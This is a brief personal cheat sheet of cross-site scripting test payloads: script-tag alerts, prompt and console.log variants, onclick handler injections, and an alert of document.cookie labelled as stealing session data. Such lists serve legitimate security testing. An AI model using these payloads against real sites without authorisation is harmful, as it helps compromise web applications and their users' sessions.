# My XSS Payloads
-------------------------------------------------------------------------------------

[+] Test if Payload is working

+ First step to check for XSS
1. <script>alert('SudoHopeX')</script>
2. <script>alert(1)</script>

+ When alert(1) is blocked
<script>prompt('XSS')</script>

+ testing silently without alert boxes
<script>console.log('XSS')</script>

+ when <script> tag is not working, then use it within an html element
onclick="alert(1)"
<a href="#" onclick="alert(1)">Click Me!</a>
<a onclick="alert(1)">Click Me!</a>

+ See (steal) session data.
<script>alert(document.cookie)</script>


-------------------------------------------------------------------------------------
